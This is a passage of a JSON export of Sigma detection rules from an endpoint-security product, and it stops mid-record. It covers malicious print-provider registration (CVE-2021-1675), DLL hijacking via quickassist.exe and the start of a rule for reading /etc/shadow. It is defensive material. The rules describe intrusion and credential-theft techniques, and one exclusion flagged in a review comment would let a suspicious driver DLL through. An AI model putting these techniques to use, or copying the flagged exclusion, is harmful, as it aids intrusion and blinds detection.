'ss??mdu.dll' # (ssi5mdu.dll, ssk4mdu.dll, ssp5mdu.dll, ssi2mdu.dll, ssk4mdu.dll)\n TargetObject|endswith: '\\Version-3\\Samsung * Series*\\Configuration File'\n - Details: 'OKC??EUI.DLL'\n TargetObject|endswith: '\\Version-3\\OKI C*\\Configuration File'\n - Details: 'ps5ui.dll'\n TargetObject|endswith:\n - '\\Version-3\\7-pdf printer\\Configuration File'\n - '\\Version-3\\bluefilesprinter\\Configuration File'\n - '\\Version-3\\canon *\\Configuration File'\n - '\\Version-3\\communicationsclients fax driver\\Configuration File'\n - '\\Version-3\\custpdf writer*\\Configuration File'\n - '\\Version-3\\dell laser printer 1720dn ps3\\Configuration File'\n - '\\Version-3\\driverbee-*\\Configuration File'\n - '\\Version-3\\edocprintpro\\Configuration File'\n - '\\Version-3\\Epson * series\\Configuration File'\n - '\\Version-3\\ezeep ps5 printer\\Configuration File'\n - '\\Version-3\\fx docucentre-vii c3372 ps\\Configuration File'\n - '\\Version-3\\Generic *\\Configuration File'\n - '\\Version-3\\ghostscript pdf\\Configuration File'\n - '\\Version-3\\icanopee printer\\Configuration File'\n - '\\Version-3\\ixbusprintdriver\\Configuration File'\n - '\\Version-3\\oki b431(ps)\\Configuration File'\n - '\\Version-3\\oki c531(ps)\\Configuration File'\n - '\\Version-3\\output manager universal ps driver\\Configuration File'\n - '\\Version-3\\papercut global postscript\\Configuration File'\n - '\\Version-3\\pdf architect driver\\Configuration File'\n - '\\Version-3\\pdf redirect pro\\Configuration File'\n - '\\Version-3\\pdfcamp printer driver\\Configuration File'\n - '\\Version-3\\primopdf\\Configuration File'\n - '\\Version-3\\pro c7500 *\\Configuration File'\n - '\\Version-3\\riso c*\\Configuration File'\n - '\\Version-3\\Sharp *\\Configuration File'\n - '\\Version-3\\siemens se pdf driver\\Configuration File'\n - '\\Version-3\\srciprintdriver\\Configuration File'\n - '\\Version-3\\ta classic universaldriver kpdl\\Configuration File'\n - '\\Version-3\\Toshiba universal 
fax\\Configuration File'\n - '\\Version-3\\vmware postscript *\\Configuration File'\n - '\\Version-3\\vnc printer (ps)\\Configuration File'\n - '\\Version-3\\waters unifi printer\\Configuration File'\n - '\\Version-3\\zwcad virtual eps driver 1.0\\Configuration File'\n - Details: 'unidrvui.dll'\n TargetObject|endswith:\n - '\\Version-3\\3d systems cube 3\\Configuration File'\n - '\\Version-3\\5006ci\\Configuration File'\n - '\\Version-3\\activefax\\Configuration File'\n - '\\Version-3\\adis driver\\Configuration File'\n - '\\Version-3\\aures odp333\\Configuration File'\n - '\\Version-3\\badgy200\\Configuration File'\n - '\\Version-3\\boca bidi fgl 26/46 300 dpi\\Configuration File'\n - '\\Version-3\\bolt pdf\\Configuration File'\n - '\\Version-3\\cab-eos5/200\\Configuration File'\n - '\\Version-3\\cab-xc q6.3/300\\Configuration File'\n - '\\Version-3\\citizen ct-s310ii\\Configuration File'\n - '\\Version-3\\color label 2000\\Configuration File'\n - '\\Version-3\\delcop universal v2 xl\\Configuration File'\n - '\\Version-3\\e-studio Generic printer hbp\\Configuration File'\n - '\\Version-3\\everyoneprint universal print driver v2\\Configuration File'\n - '\\Version-3\\evolis *\\Configuration File'\n - '\\Version-3\\fax - hp officejet *\\Configuration File'\n - '\\Version-3\\ff apeos c3570 pcl 6\\Configuration File'\n - '\\Version-3\\fx apeosport *\\Configuration File'\n - '\\Version-3\\fx docucentre *\\Configuration File'\n - '\\Version-3\\ibm infoprint 1000 series\\Configuration File'\n - '\\Version-3\\idp smart-51 card printer\\Configuration File'\n - '\\Version-3\\ip-s\\Configuration File'\n - '\\Version-3\\m08f printer\\Configuration File'\n - '\\Version-3\\m110s printer\\Configuration File'\n - '\\Version-3\\munbyn itpp941\\Configuration File'\n - '\\Version-3\\netphone fax druckertreiber\\Configuration File'\n - '\\Version-3\\oki *\\Configuration File'\n - '\\Version-3\\pagemanager pdf writer\\Configuration File'\n - '\\Version-3\\pm-241-bt\\Configuration 
File'\n - '\\Version-3\\pos-80c\\Configuration File'\n - '\\Version-3\\riso sf 5x30eii series\\Configuration File'\n - '\\Version-3\\smart notebook document writer\\Configuration File'\n - '\\Version-3\\star tsp*\\Configuration File'\n - '\\Version-3\\teamviewer printer\\Configuration File'\n - '\\Version-3\\thermal receipt #1\\Configuration File'\n - '\\Version-3\\universal laser printer\\Configuration File'\n - '\\Version-3\\universal print driver for cloud\\Configuration File'\n - '\\Version-3\\varioprint 135 pcl6 fr\\Configuration File'\n - '\\Version-3\\vnc printer (ud)\\Configuration File'\n - '\\Version-3\\xm fax\\Configuration File'\n - '\\Version-3\\zvprt?\\Configuration File'\n - Details:\n - 'us???du.dll'\n - 'up???du.dll'\n - 'spep6du.dll'\n TargetObject|endswith: '\\Version-3\\samsung *\\Configuration File'\n - Details: 'dwprinter.dll'\n TargetObject|endswith: '\\Version-3\\docuware printer driver\\Configuration File'\n - Details: 'brumfa5a.dll'\n TargetObject|endswith: '\\Version-3\\Brother * printer\\Configuration File'\n - Details: 'e_32ulc1ae.dll'\n TargetObject|endswith: '\\Version-3\\Epson sc-t7200 series\\Configuration File'\n - Details: 'gznprnui.dll'\n TargetObject|endswith:\n - '\\Version-3\\gaaiho pdf\\Configuration File'\n - '\\Version-3\\nuance pdf\\Configuration File'\n - Details: 'e_32ulc1be.dll'\n TargetObject|endswith: '\\Version-3\\Epson sc-t5200 series\\Configuration File'\n - Details: 'novauik7.dll'\n TargetObject|endswith: '\\Version-3\\novapdf 7 printer driver\\Configuration File'\n - Details: 'satov6ui.dll'\n TargetObject|endswith:\n - '\\Version-3\\sato gl408e\\Configuration File'\n - '\\Version-3\\sato ct408i\\Configuration File'\n - Details: 'solidui3.dll'\n TargetObject|endswith: '\\Version-3\\solid pdf creator\\Configuration File'\n - Details: 'seagull_v3_configdispatcher.dll'\n TargetObject|endswith:\n - '\\Version-3\\avery adtp1ef (300 dpi) - mpcl\\Configuration File'\n - \"\\\\Version-3\\\\datamax-o'neil m-4206 mark 
ii\\\\Configuration File\"\n - '\\Version-3\\godex g300\\Configuration File'\n - '\\Version-3\\godex zx1300i\\Configuration File'\n - '\\Version-3\\honeywell *\\Configuration File'\n - '\\Version-3\\monarch 9416tt3 xl (300 dpi)\\Configuration File'\n - '\\Version-3\\thermotex tt-3\\Configuration File'\n - '\\Version-3\\Toshiba b-fv4 (203 dpi)\\Configuration File'\n - '\\Version-3\\Toshiba ba400 (203 dpi)\\Configuration File'\n - '\\Version-3\\tsc *\\Configuration File'\n - '\\Version-3\\zebra *\\Configuration File'\n - Details: 'okx058ui.dll'\n TargetObject|endswith: '\\Version-3\\oki *\\Configuration File'\n - Details: 'lmiprinterui.dll'\n TargetObject|endswith: '\\Version-3\\logmein printer driver\\Configuration File'\n - Details: 'bruhla3d.dll'\n TargetObject|endswith: '\\Version-3\\Brother hl-6050 series\\Configuration File'\n - Details: 'eskmf64ui.dll'\n TargetObject|endswith: '\\Version-3\\esker mf printer driver\\Configuration File'\n - Details: 'su?hu.dll'\n TargetObject|endswith: '\\Version-3\\Sharp mx-*\\Configuration File'\n - Details: 'tht_80ui.dll'\n TargetObject|endswith: '\\Version-3\\printer tht 8.0\\Configuration File'\n - Details: 'inf619u.dll'\n TargetObject|endswith: '\\Version-3\\infotec is 2220d pcl 6\\Configuration File'\n - Details: 'nrg611u.dll'\n TargetObject|endswith: '\\Version-3\\nrg dsm415 pcl 6\\Configuration File'\n - Details: 'ophp_ui.dll'\n TargetObject|endswith: '\\Version-3\\oki c310\\Configuration File'\n - Details: 'koaxjjac.dll'\n TargetObject|endswith: '\\Version-3\\Generic 36c-0iseriespcl\\Configuration File'\n - Details: 'koaxmjac.dll'\n TargetObject|endswith: '\\Version-3\\Generic 36c-0iseriespcl\\Configuration File'\n - Details:\n - 'koaxgjac.dll'\n - 'koaxcjac.dll'\n - 'koax1jac.dll'\n - 'koax7jac.dll'\n - 'koawujac.dll'\n - 'kobs4jac.dll'\n - 'kobsbjac.dll'\n - 'koaxpjac.dll'\n - 'koax3jac.dll'\n - 'koaytjac.dll'\n - 'koaxgsac.dll'\n - 'koaxojac.dll'\n - 'koayxjac.dll'\n - 'koaytsac.dll'\n - 'koayfjac.dll'\n - 
'koaxysac.dll'\n - 'koaxdjac.dll'\n - 'kobs8jac.dll'\n TargetObject|endswith: '\\Version-3\\Generic *\\Configuration File'\n - Details: 'edocpdfu.dll'\n TargetObject|endswith: '\\Version-3\\edocprinter pdf pro\\Configuration File'\n - Details: 'unidrvui_apct.dll'\n TargetObject|endswith: '\\Version-3\\apicrypt\\Configuration File'\n - Details: 'e_32ulc1de.dll'\n TargetObject|endswith: '\\Version-3\\Epson sc-t7200d series\\Configuration File'\n - Details: 'okx055ui.dll'\n TargetObject|endswith: '\\Version-3\\oki *\\Configuration File'\n - Details: 'rici7qui.dll'\n TargetObject|endswith: '\\Version-3\\ricoh *\\Configuration File'\n - Details: 'dlxriziu.dll'\n TargetObject|endswith: '\\Version-3\\dell 2130cn color laser pcl6\\Configuration File'\n - Details: 'koaycjac.dll'\n TargetObject|endswith: '\\Version-3\\Generic 36c-9seriespcl\\Configuration File'\n - Details: 'eapuif7.dll'\n TargetObject|endswith: '\\Version-3\\Epson *\\Configuration File'\n - Details: 'AppliDisvirtualprinterdriverui.dll'\n TargetObject|endswith: '\\Version-3\\AppliDis virtual printer\\Configuration File'\n - Details: 'cboui56.dll'\n TargetObject|endswith: '\\Version-3\\cab *\\Configuration File'\n - Details: 'cabui.dll'\n TargetObject|endswith: '\\Version-3\\cab *\\Configuration File'\n - Details: 'epobw9ac.dll'\n TargetObject|endswith: '\\Version-3\\Epson al-m300 advanced\\Configuration File'\n - Details: 'e_2uic1w5e.dll'\n TargetObject|endswith: '\\Version-3\\Epson wf-c879r series pcl6\\Configuration File'\n - Details: 'sha7mdu.dll'\n TargetObject|endswith: '\\Version-3\\hp laserjet mfp m437-m443 pcl6\\Configuration File'\n - Details: 'rictw0ui.dll'\n TargetObject|endswith: '\\Version-3\\lan-fax Generic\\Configuration File'\n - Details: 'pxc50uiaf15.dll'\n TargetObject|endswith: '\\Version-3\\pdf-xchange 5.0 for finereader 15\\Configuration File'\n - Details: 'pixelplanetpdui7.dll'\n TargetObject|endswith: '\\Version-3\\pixelplanet pdfprinter 7\\Configuration File'\n - Details: 
'rc40jui.dll'\n TargetObject|endswith: '\\Version-3\\riso comcolor ft5230\\Configuration File'\n - Details: 'esrl6ui.dll'\n TargetObject|endswith: '\\Version-3\\Toshiba e-studio2809aseries pcl6\\Configuration File'\n - Details: 'bruhla5a.dll'\n TargetObject|endswith: '\\Version-3\\Brother hl-5250dn series\\Configuration File'\n - Details: 'kvpui64.dll'\n TargetObject|endswith: '\\Version-3\\kingsoft virtual printer driver\\Configuration File'\n - Details: 'kmuu84h5.dll'\n TargetObject|endswith:\n - '\\Version-3\\p-4025w mfp kx\\Configuration File'\n - '\\Version-3\\p-5534dn kx\\Configuration File'\n - Details: 'gfe6au.dll'\n TargetObject|endswith: '\\Version-3\\ricoh aficio sp c242sf pcl 6\\Configuration File'\n - Details: 'su3hu.dll'\n TargetObject|endswith: '\\Version-3\\Sharp *\\Configuration File'\n - Details: 'novaui11.dll'\n TargetObject|endswith: '\\Version-3\\novapdf 11\\Configuration File'\n - Details: 'sdo1mdu.dll'\n TargetObject|endswith: '\\Version-3\\dell 1133 laser mfp gdi\\Configuration File'\n - Details: 'e1yuicbee.dll'\n TargetObject|endswith: '\\Version-3\\Epson wf-2950 series\\Configuration File'\n - Details: 'sht12cdu.dll'\n TargetObject|endswith: '\\Version-3\\hp color laser 150\\Configuration File'\n - Details: 'varm611drvui.dll'\n TargetObject|endswith: '\\Version-3\\m611\\Configuration File'\n - Details: 'k?uu????.dll'\n TargetObject|endswith:\n - '\\Version-3\\olivetti *\\Configuration File'\n - '\\Version-3\\p-*\\Configuration File'\n - '\\Version-3\\cd-*\\Configuration File'\n - '\\Version-3\\cdc *\\Configuration File'\n - '\\Version-3\\\\* nw-fax\\Configuration File'\n - Details: 'spe__du.dll'\n TargetObject|endswith: '\\Version-3\\samsung universal print driver 2\\Configuration File'\n - Details: 'ss0xu.dll'\n TargetObject|endswith: '\\Version-3\\Sharp *\\Configuration File'\n - Details: 'bru?????.dll'\n TargetObject|endswith: '\\Version-3\\Brother *\\Configuration File'\n - Details: 'ql106nui.dll'\n TargetObject|endswith: 
'\\Version-3\\Brother ql-1060n\\Configuration File'\n - Details: 'kobkajac.dll'\n TargetObject|endswith: '\\Version-3\\bw 400-0i pcl\\Configuration File'\n - Details: 'dopdfui7.dll'\n TargetObject|endswith: '\\Version-3\\dopdf 7 printer driver\\Configuration File'\n - Details: 'dtc1250eui.dll'\n TargetObject|endswith: '\\Version-3\\dtc1250e card printer\\Configuration File'\n - Details: 'eapcuif7.dll'\n TargetObject|endswith: '\\Version-3\\Epson cgenerator(180dpi)\\Configuration File'\n - Details: 'shm4mdu.dll'\n TargetObject|endswith: '\\Version-3\\hp laser mfp 131 133 135-138\\Configuration File'\n - Details: 'okx05hui.dll'\n TargetObject|endswith: '\\Version-3\\oki *\\Configuration File'\n - Details: 'rici7jui.dll'\n TargetObject|endswith: '\\Version-3\\ricoh im c3510 jpn rpcs\\Configuration File'\n - Details: 'eng53zu.dll'\n TargetObject|endswith: '\\Version-3\\ricoh p 501 pcl 5e\\Configuration File'\n - Details: 'drvui_x64_oxhoo.dll'\n TargetObject|endswith: '\\Version-3\\tp??\\Configuration File'\n - Details: 'sxa7mdu.dll'\n TargetObject|endswith: '\\Version-3\\xerox workcentre 3225\\Configuration File'\n - Details: 'ss#zpl-u.d64'\n TargetObject|endswith: '\\Version-3\\zebra *\\Configuration File'\n - Details: 'varbmp61drvui.dll'\n TargetObject|endswith: '\\Version-3\\bmp61\\Configuration File'\n - Details: 'briu???.dll'\n TargetObject|endswith: '\\Version-3\\Brother *\\Configuration File'\n - Details: 'pt????.dll'\n TargetObject|endswith: '\\Version-3\\Brother pt*\\Configuration File'\n - Details: 'ptql????.dll'\n TargetObject|endswith: '\\Version-3\\Brother ql-*\\Configuration File'\n - Details: 'ocewpd2pui.dll'\n TargetObject|endswith:\n - '\\Version-3\\oce *\\Configuration File'\n - '\\Version-3\\canon colorwave *\\Configuration File'\n - Details: 'ss#ipl-u.d64'\n TargetObject|endswith: '\\Version-3\\easycoder *\\Configuration File'\n - Details: 'eptbk9ac.dll'\n TargetObject|endswith: '\\Version-3\\Epson al-m1200 advanced\\Configuration File'\n - Details: 
'e_puicafw.dll'\n TargetObject|endswith: '\\Version-3\\Epson pp-100nprn\\Configuration File'\n - Details: 'e_2uic1cie.dll'\n TargetObject|endswith: '\\Version-3\\Epson wf-m5399 series pcl6\\Configuration File'\n - Details: 'okc04eui.dll'\n TargetObject|endswith: '\\Version-3\\es????(pcl)\\Configuration File'\n - Details: 'brand_solution_name_pdfprnui_v*.dll'\n TargetObject|endswith: '\\Version-3\\expert pdf 15 driver\\Configuration File'\n - Details: 'sh?????.dll'\n TargetObject|endswith: '\\Version-3\\hp laser *\\Configuration File'\n - Details: 'tep39pui.dll'\n TargetObject|endswith: '\\Version-3\\king jim *\\Configuration File'\n - Details: 'ricfax64ui.dll'\n TargetObject|endswith: '\\Version-3\\lan-fax m*\\Configuration File'\n - Details: 'novauiv6.dll'\n TargetObject|endswith: '\\Version-3\\novapdf server *\\Configuration File'\n - Details: 'nrg63du.dll'\n TargetObject|endswith: '\\Version-3\\nrg mp c2500 pcl 6\\Configuration File'\n - Details: 'okx05nui.dll'\n TargetObject|endswith: '\\Version-3\\oki c834 pcl6\\Configuration File'\n - Details: 'pxc50uiaf.dll'\n TargetObject|endswith: '\\Version-3\\pdf-xchange * for finereader\\Configuration File'\n - Details: 'pdf???ps5ui64.dll'\n TargetObject|endswith: '\\Version-3\\pdf??? 
printer driver\\Configuration File'\n - Details: 'pdfillps?ui.dll'\n TargetObject|endswith: '\\Version-3\\pdfill writer\\Configuration File'\n - Details: 'pb50ui64.dll'\n TargetObject|endswith: '\\Version-3\\printboss *\\Configuration File'\n - Details: 'ric68tu.dll'\n TargetObject|endswith: '\\Version-3\\pro c7500 n-50a pcl6\\Configuration File'\n - Details: 'rc30u.dll'\n TargetObject|endswith: '\\Version-3\\riso comcolor 7150\\Configuration File'\n - Details: 'ml285pdu.dll'\n TargetObject|endswith: '\\Version-3\\samsung ml-2850 series\\Configuration File'\n - Details: 'cmprecntui.dll'\n TargetObject|endswith: '\\Version-3\\Sharpdesk composer\\Configuration File'\n - Details: 'skypdfuipro.dll'\n TargetObject|endswith: '\\Version-3\\skypdf pro driver\\Configuration File'\n - Details: 'up898srui.dll'\n TargetObject|endswith: '\\Version-3\\sony * series\\Configuration File'\n - Details: 'gxe6nu.dll'\n TargetObject|endswith: '\\Version-3\\sp 330sfn pcl 6\\Configuration File'\n - Details: 'es4px6ui.dll'\n TargetObject|endswith: '\\Version-3\\Toshiba e-studio*\\Configuration File'\n - Details: 'novaui*.dll'\n TargetObject|endswith: '\\Version-3\\novapdf *\\Configuration File'\n - Details: 'ss0iu.dll'\n TargetObject|endswith: '\\Version-3\\Sharp *\\Configuration File'\n - Details: 'zdnui50.dll'\n TargetObject|endswith: '\\Version-3\\zdesigner *\\Configuration File'\n - Details: 'winhttp.dll' # NOTE(review): a driver named 1234 whose configuration module is a Windows system DLL (winhttp.dll) does not look like any vendor driver and is exactly the kind of entry this rule exists to surface; confirm this exclusion is intentional and not a leftover from CVE-2021-1675 testing, otherwise remove it\n TargetObject|endswith: '\\Version-3\\1234\\Configuration File'\n - Details: 'av?ui56.dll'\n TargetObject|endswith: '\\Version-3\\avery *\\Configuration File'\n - Details: 'braui56.dll'\n TargetObject|endswith: '\\Version-3\\brady *\\Configuration File'\n - Details: 'ql58nui.dll'\n TargetObject|endswith: '\\Version-3\\Brother ql-580n\\Configuration File'\n - Details: 'c50ui.dll'\n TargetObject|endswith: '\\Version-3\\c50 card printer\\Configuration File'\n - Details: 'dl??????.dll'\n TargetObject|endswith: '\\Version-3\\dell *\\Configuration File'\n - Details: 'buauifnt_enc18.dll'\n 
TargetObject|endswith: '\\Version-3\\encore 18+ black ice driver\\Configuration File'\n - Details: 'epobf9ac.dll'\n TargetObject|endswith: '\\Version-3\\Epson al-m2000 advanced\\Configuration File'\n - Details: 'epobx9ac.dll'\n TargetObject|endswith: '\\Version-3\\Epson al-m400 advanced\\Configuration File'\n - Details: 'e1yuicace.dll'\n TargetObject|endswith: '\\Version-3\\Epson sc-p8500d series\\Configuration File'\n - Details: 'e_32ulc2de.dll'\n TargetObject|endswith: '\\Version-3\\Epson sc-t3400 series\\Configuration File'\n - Details: 'e_32ulc1ee.dll'\n TargetObject|endswith: '\\Version-3\\Epson sc-t5200d series\\Configuration File'\n - Details: 'e1yuicbpe.dll'\n TargetObject|endswith: '\\Version-3\\Epson wf-c5890 series\\Configuration File'\n - Details: 'e1yuiccge.dll'\n TargetObject|endswith: '\\Version-3\\Epson wf-m5899 series\\Configuration File'\n - Details: 'gpcrpui64.dll'\n TargetObject|endswith: '\\Version-3\\graphtec craft robo pro s\\Configuration File'\n - Details: 'in#idp-u.d64'\n TargetObject|endswith: '\\Version-3\\honeywell *\\Configuration File'\n - Details: 'lttilaser-*_sui.dll'\n TargetObject|endswith: '\\Version-3\\ilaser-*_s\\Configuration File'\n - Details: 'ric67lu.dll'\n TargetObject|endswith: '\\Version-3\\imc*\\Configuration File'\n - Details: 'fra55lu.dll'\n TargetObject|endswith: '\\Version-3\\infotec mp 501 pcl 5e\\Configuration File'\n - Details: 'ss#epl-u.d64'\n TargetObject|endswith:\n - '\\Version-3\\intermec pf8d\\Configuration File'\n - '\\Version-3\\zebra tlp2844\\Configuration File'\n - Details: 'magui.dll'\n TargetObject|endswith: '\\Version-3\\magicard *\\Configuration File'\n - Details: 'novauiv*.dll'\n TargetObject|endswith: '\\Version-3\\novapdf oem * printer driver\\Configuration File'\n - Details: 'novexxsolutionsui.dll'\n TargetObject|endswith: '\\Version-3\\novexx *\\Configuration File'\n - Details: 'rica????.dll'\n TargetObject|endswith: '\\Version-3\\nrg *\\Configuration File'\n - Details: 'oplv_ui.dll'\n 
TargetObject|endswith: '\\Version-3\\oki *\\Configuration File'\n - Details: 'pc#tsc-u.d64'\n TargetObject|endswith: '\\Version-3\\pdc *\\Configuration File'\n - Details: 'pdfprnui.dll'\n TargetObject|endswith:\n - '\\Version-3\\pdf architect 5 driver\\Configuration File'\n - '\\Version-3\\pdf architect 4 driver\\Configuration File'\n - '\\Version-3\\soda pdf desktop driver\\Configuration File'\n - Details: 'pxc50uia.dll'\n TargetObject|endswith: '\\Version-3\\pdf-xchange *\\Configuration File'\n - Details: 'pdfescape desktop_pdfprnui_v*.dll'\n TargetObject|endswith: '\\Version-3\\pdfescape desktop driver\\Configuration File'\n - Details: 'fppint?.dll'\n TargetObject|endswith: '\\Version-3\\pdffactory ?\\Configuration File'\n - Details: 'sx_p*_d.dll'\n TargetObject|endswith: '\\Version-3\\perfect pdf * premium driver\\Configuration File'\n - Details: 'r???????.dll'\n TargetObject|endswith: '\\Version-3\\ricoh *\\Configuration File'\n - Details: 'gxe5jau.dll'\n TargetObject|endswith: '\\Version-3\\ricoh sp c262dnw pcl 5c\\Configuration File'\n - Details: 'rc40dui.dll'\n TargetObject|endswith: '\\Version-3\\riso comcolor black fw1230\\Configuration File'\n - Details: 'rte_wrui.dll'\n TargetObject|endswith: '\\Version-3\\rte com services\\Configuration File'\n - Details: 'ss?????.dll'\n TargetObject|endswith: '\\Version-3\\samsung *\\Configuration File'\n - Details: 'rica7rui.dll'\n TargetObject|endswith: '\\Version-3\\savin im c4500 pcl 6\\Configuration File'\n - Details: 'sn0xu.dll'\n TargetObject|endswith: '\\Version-3\\Sharp mx-4101n fax\\Configuration File'\n - Details: 'skypdfuipro_mt.dll'\n TargetObject|endswith: '\\Version-3\\skypdf pro mt driver\\Configuration File'\n - Details: 'pyrmdui.dll'\n TargetObject|endswith: '\\Version-3\\slidemate as\\Configuration File'\n - Details: 'tobi_ui.dll'\n TargetObject|endswith: '\\Version-3\\Toshiba e-studio403s(pcl)\\Configuration File'\n - Details: 'es6cx6ui.dll'\n TargetObject|endswith: '\\Version-3\\Toshiba 
e-studio6530cseriespcl6\\Configuration File'\n - Details: '?s#tsc-u.d64'\n TargetObject|endswith: '\\Version-3\\tsc tc200\\Configuration File'\n - Details: 'sxp2mdu.dll'\n TargetObject|endswith: '\\Version-3\\xerox phaser 3250\\Configuration File'\n - Details: 'xr?k2axpui.dll'\n TargetObject|endswith: '\\Version-3\\xerox workcentre *\\Configuration File'\n - Details: 'nl_zebraui.dll'\n TargetObject|endswith: '\\Version-3\\zebra *\\Configuration File'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\n# level: high\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4a77686d-2ab7-4cde-9662-336a29faed1a",
"rule_name": "Spoolsv Print Provider Added",
"rule_description": "Detects the installation of a new print provider through a registry modification.\nAttackers may register a malicious print provider DLL to exploit vulnerabilities in the Print Spooler service (such as CVE-2021-1675) and gain code execution inside the spoolsv.exe process.\nIt is recommended to analyze the DLL pointed to by the registry value to determine its legitimacy, and to look for suspicious actions originating from the spoolsv.exe process.\n",
"rule_creation_date": "2021-07-01",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4ad70790-9646-46dc-b8ec-f145eb8a04ba",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082094Z",
"creation_date": "2026-03-23T11:45:34.082096Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082100Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_quickassist.yml",
"content": "title: DLL Hijacking via quickassist.exe\nid: 4ad70790-9646-46dc-b8ec-f145eb8a04ba\ndescription: |\n Detects potential Windows DLL hijacking via quickassist.exe.\n DLL hijacking takes advantage of the default Windows DLL search order: a malicious DLL is placed alongside a victim application so that it is loaded instead of the legitimate one.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n The rule fires only when both quickassist.exe and the loaded DLL reside outside System32, SysWOW64 and WinSxS, and the DLL is not signed by Microsoft Windows.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'quickassist.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\CRYPTBASE.DLL'\n - '\\d2d1.dll'\n - '\\d3d11.dll'\n - '\\dcomp.dll'\n - '\\dxgi.dll'\n - '\\PROPSYS.dll'\n - '\\SAS.dll'\n - '\\SspiCli.dll'\n - '\\UxTheme.dll'\n - '\\WindowsCodecs.dll'\n - '\\WININET.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of 
filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4ad70790-9646-46dc-b8ec-f145eb8a04ba",
"rule_name": "DLL Hijacking via quickassist.exe",
"rule_description": "Detects potential Windows DLL Hijacking via quickassist.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4af5cd27-b69e-4679-a1b5-b6f72cc439aa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.650422Z",
"creation_date": "2026-03-23T11:45:35.296928Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296932Z",
"rule_level": "high",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md",
"https://attack.mitre.org/techniques/T1003/008/",
"https://attack.mitre.org/techniques/T1078/"
],
"name": "t1003_008_etc_shadow_read.yml",
